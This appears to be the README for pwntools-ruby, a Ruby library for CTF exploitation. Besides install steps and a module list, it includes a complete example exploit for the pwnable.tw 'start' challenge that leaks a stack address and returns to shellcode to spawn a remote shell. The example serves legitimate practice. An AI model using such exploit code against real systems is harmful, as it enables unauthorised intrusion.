pwntools-ruby
Always sad when playing CTF that there's nothing equivalent to pwntools in Python. While pwntools is awesome, I always love Ruby far more than Python... So this is an attempt to create such library.
Would try to have consistent naming with original pwntools, and do things in Ruby style.
Example Usage
Here's an exploitation for start
which is a challenge on pwnable.tw.
# encoding: ASCII-8BIT
# The encoding line is important most time, or you'll get "\u0000" when using "\x00" in code,
# which is NOT what we want when doing pwn...
require 'pwn'
context.arch = 'i386'
context.log_level = :debug
z = Sock.new 'chall.pwnable.tw', 10000
z.recvuntil "Let's start the CTF:"
z.send p32(0x8048087).rjust(0x18, 'A')
stk = u32(z.recvuntil "\xff")
log.info "stack address: #{stk.hex}" # Log stack address
# Return to shellcode
addr = stk + 0x14
payload = addr.p32.rjust(0x18, 'A') + asm(shellcraft.sh)
z.write payload
# Switch to interactive mode
z.interact
More features and details can be found in the documentation.
Installation
Install the latest release:
gem install pwntools
Install from master branch:
git clone https://github.com/peter50216/pwntools-ruby
cd pwntools-ruby
bundle install && bundle exec rake install
optional
Some of the features (assembling/disassembling) require non-Ruby dependencies. Checkout the installation guide for keystone-engine and capstone-engine.
Or you are able to get running quickly with
# Install Capstone
sudo apt-get install libcapstone3
# Compile and install Keystone from source
sudo apt-get install cmake
git clone https://github.com/keystone-engine/keystone.git /tmp/keystone
cd /tmp/keystone
mkdir build
cd build
../make-share.sh
sudo make install
Supported Features
Architectures
- i386
- amd64
- arm
- thumb
Modules
- context
- asm
- disasm
- shellcraft
- elf
- dynelf
- logger
- tube
- sock
- process
- serialtube
- fmtstr
- util
- pack
- cyclic
- fiddling
Development
git clone https://github.com/peter50216/pwntools-ruby
cd pwntools-ruby
bundle
bundle exec rake
Note to irb users
irb defines main.context
.
For the ease of exploit development in irb, that method would be removed if you use require 'pwn'
.
You can still get the IRB::Context
by irb_context
.